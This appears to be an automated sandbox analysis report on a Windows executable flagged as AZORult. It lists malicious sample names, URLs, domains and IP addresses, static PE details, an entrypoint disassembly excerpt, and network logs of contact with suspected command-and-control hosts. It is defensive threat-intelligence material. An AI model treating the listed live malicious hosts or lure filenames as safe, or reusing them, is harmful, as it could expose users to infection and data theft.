	scancopy.exe	Get hash	malicious	Browse	www.signaturelandmarkreo.com/mpus/?jZt=JJBPK2i0&5jvX=x56w9RwRz4AV6CCBrUsBL3ACCQyK2dM3JqMYE8SQI6sq5FNJFnS4ajSVpvFd2wEGM/DV
	0Ol5vRsauA.exe	Get hash	malicious	Browse	www.hauhome.club/n8ba/?gR=3fH8bT-PS&T0G=NUeE9ayc3PySnAVgNXjn0BYB7KGsqh3j5qPQnKWJKMOSIWaR3h7kqTPRULqyEvALIIH6
	PRICE REQUEST 40 ft container x2.xlsx	Get hash	malicious	Browse	www.hauhome.club/n8ba/?p8Y8=mT0xlL38IP&_pp8FF=NUeE9ayZ3IyWnQZsPXjn0BYB7KGsqh3j5qXA7JKIOsOTIn2Xwxqo8X3TXuGOfP04HJSKyQ==
	jxotfrv2bv.exe	Get hash	malicious	Browse	www.pon.xyz/wufn/?UlZh=0rmTI&iR=TjHmMFEU1Fmg2XzTD4fy73K0u4EyZw5fKq8O2A/t56j1GMEWHoQPUZZu8+R7DfoFhDpv
	3Rpt867Unp.exe	Get hash	malicious	Browse	www.elglink99.com/6mam/?2dl4tF=SLcUjScEkW6xUOQFBoDDz2hKjpXj+iqBcrwvzM+4m/NAMuuhQPRgGkr0S29rLHT8R6Zo&d0=z4VPJNO82DhhP

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
survey-smiles.com	EnhancedMap.exe	Get hash	malicious	Browse	5.79.68.110
	EnhancedMap.exe	Get hash	malicious	Browse	5.79.68.107
	7zip_installer.exe	Get hash	malicious	Browse	5.79.68.109
	Adjunto K_23165.doc	Get hash	malicious	Browse	5.79.68.110
	o8fQ05Cc29.exe	Get hash	malicious	Browse	5.79.68.108
	pimTNyOSw.exe	Get hash	malicious	Browse	127.0.0.1
	http://162.222.213.199	Get hash	malicious	Browse	127.0.0.1
	http://survey-smiles.com/	Get hash	malicious	Browse	127.0.0.1
12065.BODIS.com	rex for fs2004__3039_i1291358365_il1363251.exe	Get hash	malicious	Browse	199.59.242.153
	sample17.exe	Get hash	malicious	Browse	199.59.242.153
	ZIPEXT#U007e1.EXE	Get hash	malicious	Browse	199.59.242.153
	http://ww1.ebdr3.com	Get hash	malicious	Browse	199.59.242.153
	http://att.cm	Get hash	malicious	Browse	199.59.242.153
	http://blackbarrymobile.com	Get hash	malicious	Browse	199.59.242.153
	http://jrpgreview.com/uploads/1/3/0/8/130874396/130874396.html#la+escuela+de+los+annales+una+historia+intelectual	Get hash	malicious	Browse	199.59.242.153
	http://nihwebex.com	Get hash	malicious	Browse	199.59.242.153
	http://nihwebex.com	Get hash	malicious	Browse	199.59.242.153
	http://www.ilmakige.com	Get hash	malicious	Browse	199.59.242.153
	http://ww1.santanderebanking.com/?subid1=6a863c98-149d-11eb-a23d-6b8e800b043f	Get hash	malicious	Browse	199.59.242.153
	http://walmarrtgiftcard.com	Get hash	malicious	Browse	199.59.242.153
	http://myiconicit.com	Get hash	malicious	Browse	199.59.242.153
	http://redrobing.com	Get hash	malicious	Browse	199.59.242.153
	http://flamme.co	Get hash	malicious	Browse	199.59.242.153
	http://www.firehousezen.com/	Get hash	malicious	Browse	199.59.242.153
	http://cs.tekblue.net	Get hash	malicious	Browse	199.59.242.153
	http://ww1.sanjosetaqueriamexicanrestaurant.com/	Get hash	malicious	Browse	199.59.242.153
	http://besybuy.com	Get hash	malicious	Browse	199.59.242.153
	http://ww1.cchcplink.com/	Get hash	malicious	Browse	199.59.242.153

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
LEASEWEB-NL-AMS-01NetherlandsNL	4E56F35781FC7279ED306516E2CFD700E32DAA86E2F11.exe	Get hash	malicious	Browse	37.48.74.101
	A4PC3ueREc.exe	Get hash	malicious	Browse	37.48.74.101
	17Rom1F3MY	Get hash	malicious	Browse	45.130.62.180
	Iu8Qn68jzj	Get hash	malicious	Browse	45.130.62.175
	aUeiDNQvHa.exe	Get hash	malicious	Browse	5.79.75.41
	xbx6bxavxK	Get hash	malicious	Browse	45.130.62.125
	8AcNX5GzVY.exe	Get hash	malicious	Browse	95.211.210.72
	UtOsDoGny7.dll	Get hash	malicious	Browse	83.149.73.233
	test.dll	Get hash	malicious	Browse	83.149.73.233
	test.dll	Get hash	malicious	Browse	83.149.73.233
	#U0413#U043e#U0441. #U0438#U043d#U0432#U0435#U0441#U0442#U0438#U0446#U0438#U0438 - 367642 .htm	Get hash	malicious	Browse	213.227.132.161
	7b388AC1Fw	Get hash	malicious	Browse	80.65.36.141
	KXM253rCpW	Get hash	malicious	Browse	45.130.62.182
	Antisocial.arm	Get hash	malicious	Browse	95.211.189.190
	CEB40B25F6CCEFA258CA5E9DAB520E63280FBB2FDCB2C.exe	Get hash	malicious	Browse	82.192.82.227
	8VYt7f45al.exe	Get hash	malicious	Browse	37.48.74.101
	rCOasd31sO.exe	Get hash	malicious	Browse	37.48.72.7
	boaqaa.exe	Get hash	malicious	Browse	89.149.227.194
	vq0sPlNJDK	Get hash	malicious	Browse	185.122.171.73
	DWVByMCYL8.exe	Get hash	malicious	Browse	213.227.140.23
NOCIXUS	D0dWfPSslC	Get hash	malicious	Browse	198.204.224.31
	5PfBAmWq3V.exe	Get hash	malicious	Browse	107.150.36.162
	xkHUcq0X5b.exe	Get hash	malicious	Browse	63.141.234.35
	Symphonyhealth-FX#615612.htm	Get hash	malicious	Browse	198.204.239.68
	raw.exe	Get hash	malicious	Browse	63.141.242.45
	PO#4500484210.exe	Get hash	malicious	Browse	63.141.242.45
	Dunes Industries P03356202114.exe	Get hash	malicious	Browse	192.187.111.221
	Sat#U0131n Alma Sipari#U015fi.exe	Get hash	malicious	Browse	192.187.111.220
	1wKONPeBx1.exe	Get hash	malicious	Browse	107.150.39.138
	210709 Commercial Invoice Hyundai Parc SBO (2) (1).exe	Get hash	malicious	Browse	192.187.111.220
	m1Be7JKUv4.exe	Get hash	malicious	Browse	63.141.242.43
	Invoice #210722 14,890 $.exe	Get hash	malicious	Browse	63.141.242.44
	rxfttQnoO5	Get hash	malicious	Browse	198.204.224.39
	8944848MNBV.exe	Get hash	malicious	Browse	192.187.111.221
	datos bancarios y factura.pdf_______________________________________________.exe	Get hash	malicious	Browse	63.141.228.141
	lhPBRhaC3B.exe	Get hash	malicious	Browse	63.141.228.141
	Form RTE PT COMMUNICATION CSI PER 2021.PDF.exe	Get hash	malicious	Browse	63.141.228.141
	AFSkxRKWjF.exe	Get hash	malicious	Browse	63.141.228.141
	SecuriteInfo.com.W32.MSIL_Kryptik.DLO.genEldorado.16019.exe	Get hash	malicious	Browse	63.141.228.141
	Balancesheet-COAU7231833484.pdf.exe	Get hash	malicious	Browse	63.141.228.141
BODIS-NJUS	RFQ_Beijing Chengruisi Manufacturing_pdf.exe	Get hash	malicious	Browse	199.59.242.153
	SQLPLUS.EXE	Get hash	malicious	Browse	199.59.242.153
	TNT 07833955.exe	Get hash	malicious	Browse	199.59.242.153
	LogJhhPPyK.exe	Get hash	malicious	Browse	199.59.242.153
	PO.exe	Get hash	malicious	Browse	199.59.242.153
	D1B9D1321F517D78BC0D1D03C5ED3C20A1CCB85BF755B.exe	Get hash	malicious	Browse	199.59.242.153
	pay.exe	Get hash	malicious	Browse	199.59.242.153
	DOC.exe	Get hash	malicious	Browse	199.59.242.153
	Factura proforma adjunta.exe	Get hash	malicious	Browse	199.59.242.150
	RFQ.Order 0128-44.exe	Get hash	malicious	Browse	199.59.242.153
	K.exe	Get hash	malicious	Browse	199.59.242.150
	0001.exe	Get hash	malicious	Browse	199.59.242.150
	PAYMENT ADVICE.exe	Get hash	malicious	Browse	199.59.242.153
	rex for fs2004__3039_i1291358365_il1363251.exe	Get hash	malicious	Browse	199.59.242.153
	BIN.exe	Get hash	malicious	Browse	199.59.242.153
	U8mrImRa5n.exe	Get hash	malicious	Browse	199.59.242.153
	purchase order No. 00109877 pdf.exe	Get hash	malicious	Browse	199.59.242.153
	XTRA POWER SOLAR PRODUCTS - OFF GRID 2021-8-23.xlsx	Get hash	malicious	Browse	199.59.242.153
	scancopy.exe	Get hash	malicious	Browse	199.59.242.153
	0Ol5vRsauA.exe	Get hash	malicious	Browse	199.59.242.153

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

No created / dropped files found

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.398979169143917
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	2F530A45E4ACF58D16DAD1B1E23B5B1419BA893C2F76F.exe
File size:	208384
MD5:	73bd76f0549cc1992d943ddfd92a9c4d
SHA1:	802e70b76c7c0860b3a4a257b1bc96fc3430ff01
SHA256:	2f530a45e4acf58d16dad1b1e23b5b1419ba893c2f76f6625da3acb86933462f
SHA512:	4a524d1a552eb6d101f9ceb25c7dc608669eeca7dc99bc5ddc2b9d7d3c8f4ffd3cd8f12c3328b07d80888d6758aff970b3e6898f88c3451a058224b83007e521
SSDEEP:	3072:ayzKqAOparE8YPbtMrxH5C000IS7IrfAgneF9RUQo6qHqn/PNAyv:nefOUGPbtMru00JD09RUQzqHOXN
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........Y..{7..{7..{7..)...{7..)...{7..)...{7.Qtj..{7..{6..y7...Y..{7...K..{7..)...{7.Rich.{7.................PE..L.....][...........

File Icon


Icon Hash:	00828e8e8686b000

Static PE Info

General
Entrypoint:	0x40d563
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x5B5D7FF4 [Sun Jul 29 08:51:00 2018 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	32bb5b6675247577e2dc1b39cb495d8f

Entrypoint Preview

Instruction
call 00007FBD948785BBh
jmp 00007FBD9487603Dh
nop
nop
push ebp
push esp
pop ebp
push esi
push dword ptr [00430D48h]
mov esi, dword ptr [00401434h]
call esi
or eax, eax
je 00007FBD948761E3h
mov eax, dword ptr [00430D44h]
cmp eax, FFFFFFFFh
je 00007FBD948761D9h
push eax
push dword ptr [00430D48h]
call esi
call eax
or eax, eax
je 00007FBD948761CAh
mov eax, dword ptr [eax+000001F8h]
jmp 00007FBD948761E9h
mov esi, 00401970h
push esi
call dword ptr [00401650h]
or eax, eax
jne 00007FBD948761CDh
push esi
call 00007FBD948776A5h
pop ecx
or eax, eax
je 00007FBD948761DAh
push 00401960h
push eax
call dword ptr [00401544h]
or eax, eax
je 00007FBD948761CAh
push dword ptr [ebp+08h]
call eax
mov dword ptr [ebp+08h], eax
mov eax, dword ptr [ebp+08h]
pop esi
pop ebp
ret
push 00000000h
call 00007FBD9487614Ch
pop ecx
ret
pushfd
popfd
push ebp
push esp
pop ebp
push esi
push dword ptr [00430D48h]
mov esi, dword ptr [00401434h]
call esi
or eax, eax
je 00007FBD948761E3h
mov eax, dword ptr [00430D44h]
cmp eax, FFFFFFFFh
je 00007FBD948761D9h
push eax
push dword ptr [00430D48h]
call esi
call eax
or eax, eax
je 00007FBD948761CAh
mov eax, dword ptr [eax+000001FCh]
jmp 00007FBD948761E9h
mov esi, 00401970h
push esi
call dword ptr [00001650h]

Rich Headers

Programming Language:

[ C ] VS2008 build 21022
[RES] VS2005 build 50727
[ASM] VS2008 build 21022
[C++] VS2005 build 50727
[LNK] VS2008 build 21022
[C++] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x14030	0xb4	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x47000	0x2dc0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x2aa8	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x930	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x161e8	0x16200	False	0.515724311441	data	6.44383361512	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x18000	0x2e57c	0x19a00	False	0.732269435976	data	6.10591438138	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x47000	0x2dc0	0x2e00	False	0.323029891304	data	4.01557616695	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_DIALOG	0x473d0	0x27e	data
RT_DIALOG	0x47650	0x5a0	data
RT_DIALOG	0x47bf0	0x472	data
RT_DIALOG	0x48068	0x394	data
RT_DIALOG	0x48400	0x21e	data
RT_DIALOG	0x48620	0xe0	data
RT_DIALOG	0x48700	0x234	data
RT_DIALOG	0x48938	0x192	data
RT_DIALOG	0x48ad0	0xe8	data
RT_DIALOG	0x48bb8	0x34	data
RT_STRING	0x48bf0	0xc4	data
RT_STRING	0x48cb8	0xcc	data
RT_STRING	0x48d88	0x174	data
RT_STRING	0x48f00	0x39c	data
RT_STRING	0x492a0	0x34c	data
RT_STRING	0x495f0	0x294	data
RT_VERSION	0x49888	0x348	data
RT_MANIFEST	0x49bd0	0x1ea	XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL	Import
USER32.dll	GetWindow, DialogBoxIndirectParamW, CallNextHookEx, LoadImageW, LoadIconW, EnableMenuItem, GetSystemMenu, wvsprintfW, CharUpperW, GetForegroundWindow, GetIconInfo, DrawIconEx, SetRectEmpty, DrawFocusRect, WindowFromPoint, GetMenuDefaultItem, CreatePopupMenu, MessageBeep, GetNextDlgGroupItem, IsRectEmpty, SetRect, InvalidateRgn, CopyAcceleratorTableW, CharNextW, DestroyIcon, DeleteMenu, GetDialogBaseUnits, SystemParametersInfoW, GetMenuItemInfoW, DestroyMenu, RealChildWindowFromPoint, InflateRect, UnregisterClassW, GetSysColorBrush, KillTimer, SetTimer, WaitMessage, MapDialogRect, SetWindowContextHelpId, RegisterClipboardFormatW, ShowOwnedPopups, PostQuitMessage, TranslateMessage, MapVirtualKeyW, GetKeyNameTextW, LoadMenuW, SendDlgItemMessageA, GetActiveWindow, GetNextDlgTabItem, CreateDialogIndirectParamW, IsDialogMessageW, ScrollWindowEx, UnhookWindowsHookEx, SetWindowsHookExW, PtInRect, OffsetRect, FillRect, GetSysColor, GetCursorPos, AdjustWindowRectEx, GetWindowTextLengthW, GetWindowTextW, RemovePropW, SetPropW, InvalidateRect, GetUpdateRect, EndPaint, BeginPaint, GetWindowDC, SetForegroundWindow, MessageBoxA, SetActiveWindow, DrawTextW, GetMenu, IsWindowEnabled, SetCapture, IsZoomed, IsWindowVisible, SetWindowPlacement, GetWindowPlacement, SetWindowPos, DestroyWindow, CreateWindowExW, GetClassInfoExW, RegisterClassExW, RegisterClassW, CallWindowProcW, GetClassNameW, EnumWindows, MapWindowPoints, IsWindow, SendNotifyMessageW, SendMessageTimeoutW, CharLowerW, DrawIcon, GetSystemMetrics, IsIconic, LoadStringW, RegisterWindowMessageW, EnableScrollBar, HideCaret, InvertRect, NotifyWinEvent, DrawStateW, DefWindowProcW, GetWindowWord, SetWindowWord, GetClientRect, LoadCursorW, GetLastActivePopup, ShowWindow, PostMessageW, SendMessageW, EnableWindow, DialogBoxParamW, SetDlgItemTextW, EndDialog, GetWindowRect, OemToCharA, GetWindowLongW, SetWindowLongW, GetKeyState, PeekMessageW, DispatchMessageW, SetCursor, GetParent, SendDlgItemMessageW, GetDlgItem, UpdateWindow, MessageBoxW, SetWindowTextW, GetDlgItemTextW, ReleaseDC, CopyImage, ScreenToClient, GetMessageW, wsprintfW, GetClassNameA, wsprintfA, SetFocus, GetDC, ClientToScreen
SHELL32.dll	SHGetSpecialFolderLocation, SHFileOperationW, SHGetFileInfoW, SHGetPathFromIDListW, SHBrowseForFolderW, ShellExecuteExW, SHGetMalloc, ShellExecuteW, SHGetFolderPathW, SHGetSpecialFolderPathW
ole32.dll	OleUninitialize, CoCreateInstance, CoTaskMemFree, OleInitialize, CoInitialize
ADVAPI32.dll	RegDeleteKeyW, AllocateAndInitializeSid, FreeSid, RegCloseKey, RegCreateKeyExW, RegQueryValueW, RegSetValueW, RegCreateKeyW, RegQueryInfoKeyW, RegOpenKeyW, RegEnumValueW, RegEnumKeyW, RegDeleteValueW, ReportEventA, RegEnumKeyExW, RegSetValueExW, RegQueryValueExW, RegOpenKeyExW, CheckTokenMembership
GDI32.dll	SelectClipRgn, SetDIBits, SetDIBitsToDevice, StretchDIBits, SetStretchBltMode, SetBrushOrgEx, SetICMMode, GetColorSpace, GetLogColorSpaceW, SetTextCharacterExtra, SetTextAlign, SetTextJustification, PlayMetaFileRecord, EnumMetaFile, SetWorldTransform, ModifyWorldTransform, SetColorAdjustment, StartDocW, ArcTo, PolyDraw, SelectClipPath, SetArcDirection, ExtCreatePen, MoveToEx, TextOutW, ExtTextOutW, PolyBezierTo, PolylineTo, SetViewportExtEx, SaveDC, SetWindowExtEx, SetWindowOrgEx, OffsetViewportOrgEx, OffsetWindowOrgEx, ScaleViewportExtEx, ScaleWindowExtEx, PatBlt, CombineRgn, GetMapMode, SetRectRgn, DPtoLP, GetBkColor, GetRgnBox, CreatePalette, GetNearestPaletteIndex, GetPaletteEntries, GetDIBits, RealizePalette, CreateDIBitmap, EnumFontFamiliesW, GetTextCharsetInfo, SetPixel, StretchBlt, SetDIBColorTable, CreateEllipticRgn, Ellipse, CreatePolygonRgn, Polygon, Polyline, Rectangle, EnumFontFamiliesExW, OffsetRgn, GetCurrentObject, CreateFontW, GetCharWidthW, RoundRect, FrameRgn, PtInRegion, SetPixelV, ExtFloodFill, SetPaletteEntries, FillRgn, GetBoundsRect, GetWindowOrgEx, LPtoDP, GetViewportOrgEx, EndDoc, StartPage, EndPage, AbortDoc, SetAbortProc, GetROP2, GetBkMode, GetNearestColor, GetPolyFillMode, GetStretchBltMode, GetTextAlign, GetTextFaceW, CloseMetaFile, CreateMetaFileW, DeleteMetaFile, RestoreDC, RectVisible, PtVisible, PlayMetaFile, CreateCompatibleBitmap, SetROP2, SetPolyFillMode, GetLayout, SetLayout, SetMapMode, SetGraphicsMode, SetMapperFlags, SelectPalette, ExtSelectClipRgn, GetTextColor, GdiFlush, SetViewportOrgEx, CreateDCA, GetBitmapBits, GetObjectA, CreateDIBSection, SetTextColor, SetBkMode, GetTextExtentPoint32W, GetStockObject, GetPixel, DeleteDC, CreateSolidBrush, CreateCompatibleDC, BitBlt, AddFontResourceW, SelectObject, DeleteObject, GetObjectW, GetDeviceCaps, GetSystemPaletteEntries, CreateFontIndirectW, OffsetClipRgn, LineTo, IntersectClipRect, GetWindowExtEx, GetViewportExtEx, GetObjectType, GetCurrentPositionEx, GetClipRgn, GetClipBox, ExcludeClipRect, Escape, CreatePatternBrush, CreatePen, CreateHatchBrush, CreateDIBPatternBrushPt, CreateBitmap, CreateDCW, CopyMetaFileW, GetTextMetricsW, SetBkColor, CreateRoundRectRgn, CreateRectRgn, CreateRectRgnIndirect, CreateBrushIndirect
COMCTL32.dll	ImageList_Create, ImageList_Destroy, ImageList_AddMasked
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
KERNEL32.dll	InitializeCriticalSectionAndSpinCount, RtlUnwind, IsDebuggerPresent, InterlockedDecrement, InterlockedIncrement, LockFile, UnlockFile, DuplicateHandle, lstrcmpiW, MoveFileW, GetStringTypeExW, GetFileAttributesExW, GetFileTime, LocalFileTimeToFileTime, SetFileTime, lstrcpyW, SetErrorMode, VerSetConditionMask, VerifyVersionInfoW, GetTempFileNameW, _lclose, _llseek, LoadLibraryW, LoadLibraryExW, GetEnvironmentVariableW, ExpandEnvironmentStringsW, GetSystemDirectoryW, GetTempPathW, GetWindowsDirectoryW, RemoveDirectoryW, SetFileAttributesW, DeleteFileW, FindFirstFileW, FindNextFileW, CopyFileA, CopyFileW, MoveFileExW, GetSystemDefaultLCID, GetUserDefaultLCID, TerminateThread, SetLastError, SetEvent, ResetEvent, GetSystemTimeAsFileTime, CreateEventW, GlobalLock, GlobalUnlock, MultiByteToWideChar, CompareStringW, GetFullPathNameW, GetShortPathNameW, GetExitCodeProcess, GetFileSizeEx, SetHandleInformation, CreatePipe, CreateProcessW, GetDiskFreeSpaceExW, GetCurrentThreadId, GetCurrentThread, GetSystemInfo, WaitForMultipleObjects, GetTickCount, WritePrivateProfileStringW, GetStringTypeW, SetThreadPriority, ResumeThread, GetSystemTime, GetLocalTime, SystemTimeToTzSpecificLocalTime, GetTimeZoneInformation, SystemTimeToFileTime, GetVolumeInformationW, FileTimeToSystemTime, ExitProcess, lstrlenA, GlobalSize, FormatMessageW, OutputDebugStringA, EncodePointer, DecodePointer, GetVersion, GetModuleHandleA, GlobalDeleteAtom, lstrcmpW, LoadLibraryA, GlobalAddAtomW, GlobalFindAtomW, SuspendThread, lstrcmpA, CompareStringA, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GlobalReAlloc, GlobalHandle, LocalReAlloc, GlobalGetAtomNameW, GetAtomNameW, GetThreadLocale, GlobalFlags, GetLocaleInfoW, GetSystemDefaultUILanguage, SetEnvironmentVariableA, GetFullPathNameA, EnumSystemLocalesW, IsValidLocale, LCMapStringW, GetTimeFormatW, GetDateFormatW, OutputDebugStringW, SetConsoleCtrlHandler, FatalAppExitA, SetCurrentDirectoryW, PeekNamedPipe, GetFileInformationByHandle, WriteConsoleW, SetFilePointerEx, GetCPInfo, GetOEMCP, GetACP, IsValidCodePage, SetUnhandledExceptionFilter, UnhandledExceptionFilter, FreeEnvironmentStringsW, GetEnvironmentStringsW, QueryPerformanceCounter, GetStartupInfoW, GetStdHandle, GetFileType, SetStdHandle, VirtualQuery, VirtualAlloc, AreFileApisANSI, IsProcessorFeaturePresent, HeapQueryInformation, HeapSize, GetDriveTypeW, ExitThread, CreateThread, ReadConsoleW, GetProcessHeap, HeapAlloc, GetConsoleMode, GetConsoleCP, FindNextFileA, HeapReAlloc, HeapFree, RaiseException, LocalUnlock, LocalLock, GetDiskFreeSpaceW, GetUserDefaultUILanguage, SearchPathW, GetProfileIntW, _lwrite, _lread, OpenFile, lstrlenW, GetProcAddress, GetExitCodeThread, FindResourceExA, GlobalMemoryStatusEx, SetThreadLocale, GetQueuedCompletionStatus, CreateIoCompletionPort, SetProcessWorkingSetSize, IsBadReadPtr, SetEnvironmentVariableW, lstrcpynA, lstrcpyA, lstrcatW, lstrcmpiA, lstrcpynW, CompareFileTime, HeapCreate, GetStartupInfoA, SetHandleCount, GetCommandLineA, GetEnvironmentStrings, FreeEnvironmentStringsA, GetModuleFileNameA, VirtualFree, GetLocaleInfoA, GetStringTypeA, GetConsoleOutputCP, WriteConsoleA, CreateFileA, DosDateTimeToFileTime, LCMapStringA, VirtualProtect, SetConsoleMode, ReadConsoleInputA, PeekConsoleInputA, GlobalMemoryStatus, GetVersionExA, FindFirstFileA, HeapDestroy, GetCurrentDirectoryW, FileTimeToLocalFileTime, FlushFileBuffers, LockResource, LoadResource, SizeofResource, FindResourceW, CloseHandle, MulDiv, CreateSemaphoreW, OpenSemaphoreW, GetModuleFileNameW, GetFileAttributesW, GetLastError, Sleep, GetCommandLineW, GetVersionExW, GetSystemDefaultLangID, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, FreeResource, GetFileSize, WriteFile, ReadFile, SetEndOfFile, SetFilePointer, GetModuleHandleW, GetPrivateProfileIntW, GetPrivateProfileStringW, GetPrivateProfileSectionNamesW, CreateDirectoryW, CreateFileW, WideCharToMultiByte, FindResourceExW, LocalAlloc, LocalFree, FreeLibrary, GlobalAlloc, GlobalFree, OpenProcess, GetCurrentProcess, GetCurrentProcessId, TerminateProcess, WaitForSingleObject, FindClose

Version Infos

Description	Data
LegalCopyright	Blood Accepting Center Donate
FileVersion	6.4.0.0
CompanyName	Blood Accepting Center Donate
Comments	Blood Accepting Center Donate
ProductName	Blood Accepting Center Donate
ProductVersion	6.4.0.0
FileDescription	Blood Accepting Center Donate
Translation	0x0000 0x04b0

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
09/28/21-00:51:21.739100	TCP	2029465	ET TROJAN Win32/AZORult V3.2 Client Checkin M15	49862	80	192.168.2.3	63.141.242.43

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 28, 2021 00:51:21.601078987 CEST	49862	80	192.168.2.3	63.141.242.43
Sep 28, 2021 00:51:21.738073111 CEST	80	49862	63.141.242.43	192.168.2.3
Sep 28, 2021 00:51:21.738209009 CEST	49862	80	192.168.2.3	63.141.242.43
Sep 28, 2021 00:51:21.739099979 CEST	49862	80	192.168.2.3	63.141.242.43
Sep 28, 2021 00:51:21.874546051 CEST	80	49862	63.141.242.43	192.168.2.3
Sep 28, 2021 00:51:21.887695074 CEST	80	49862	63.141.242.43	192.168.2.3
Sep 28, 2021 00:51:21.887880087 CEST	49862	80	192.168.2.3	63.141.242.43
Sep 28, 2021 00:51:21.887952089 CEST	80	49862	63.141.242.43	192.168.2.3
Sep 28, 2021 00:51:21.888048887 CEST	49862	80	192.168.2.3	63.141.242.43
Sep 28, 2021 00:51:21.912318945 CEST	49862	80	192.168.2.3	63.141.242.43
Sep 28, 2021 00:51:21.947171926 CEST	49863	80	192.168.2.3	5.79.68.108
Sep 28, 2021 00:51:21.972378016 CEST	80	49863	5.79.68.108	192.168.2.3
Sep 28, 2021 00:51:21.972542048 CEST	49863	80	192.168.2.3	5.79.68.108
Sep 28, 2021 00:51:21.973798990 CEST	49863	80	192.168.2.3	5.79.68.108
Sep 28, 2021 00:51:21.998682022 CEST	80	49863	5.79.68.108	192.168.2.3
Sep 28, 2021 00:51:22.030646086 CEST	80	49863	5.79.68.108	192.168.2.3
Sep 28, 2021 00:51:22.030772924 CEST	49863	80	192.168.2.3	5.79.68.108
Sep 28, 2021 00:51:22.030849934 CEST	80	49863	5.79.68.108	192.168.2.3
Sep 28, 2021 00:51:22.030930042 CEST	49863	80	192.168.2.3	5.79.68.108
Sep 28, 2021 00:51:22.034970999 CEST	49863	80	192.168.2.3	5.79.68.108
Sep 28, 2021 00:51:22.053751945 CEST	80	49862	63.141.242.43	192.168.2.3
Sep 28, 2021 00:51:22.060743093 CEST	80	49863	5.79.68.108	192.168.2.3
Sep 28, 2021 00:51:22.065116882 CEST	49864	80	192.168.2.3	199.59.242.153
Sep 28, 2021 00:51:22.165390015 CEST	80	49864	199.59.242.153	192.168.2.3
Sep 28, 2021 00:51:22.165517092 CEST	49864	80	192.168.2.3	199.59.242.153
Sep 28, 2021 00:51:22.166258097 CEST	49864	80	192.168.2.3	199.59.242.153
Sep 28, 2021 00:51:22.269443989 CEST	80	49864	199.59.242.153	192.168.2.3
Sep 28, 2021 00:51:22.269495964 CEST	80	49864	199.59.242.153	192.168.2.3
Sep 28, 2021 00:51:22.269531965 CEST	80	49864	199.59.242.153	192.168.2.3
Sep 28, 2021 00:51:22.269548893 CEST	80	49864	199.59.242.153	192.168.2.3
Sep 28, 2021 00:51:22.269675970 CEST	49864	80	192.168.2.3	199.59.242.153
Sep 28, 2021 00:51:22.624212980 CEST	49864	80	192.168.2.3	199.59.242.153

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 28, 2021 00:49:13.195946932 CEST	57875	53	192.168.2.3	8.8.8.8
Sep 28, 2021 00:49:13.217205048 CEST	53	57875	8.8.8.8	192.168.2.3
Sep 28, 2021 00:49:38.690270901 CEST	54154	53	192.168.2.3	8.8.8.8
Sep 28, 2021 00:49:38.717736006 CEST	53	54154	8.8.8.8	192.168.2.3
Sep 28, 2021 00:49:59.441868067 CEST	52806	53	192.168.2.3	8.8.8.8
Sep 28, 2021 00:49:59.475826025 CEST	53	52806	8.8.8.8	192.168.2.3
Sep 28, 2021 00:50:00.595307112 CEST	53910	53	192.168.2.3	8.8.8.8
Sep 28, 2021 00:50:00.643851995 CEST	53	53910	8.8.8.8	192.168.2.3
Sep 28, 2021 00:50:01.142472982 CEST	64021	53	192.168.2.3	8.8.8.8
Sep 28, 2021 00:50:01.178021908 CEST	53	64021	8.8.8.8	192.168.2.3
Sep 28, 2021 00:50:01.506490946 CEST	60784	53	192.168.2.3	8.8.8.8
Sep 28, 2021 00:50:01.523854971 CEST	53	60784	8.8.8.8	192.168.2.3
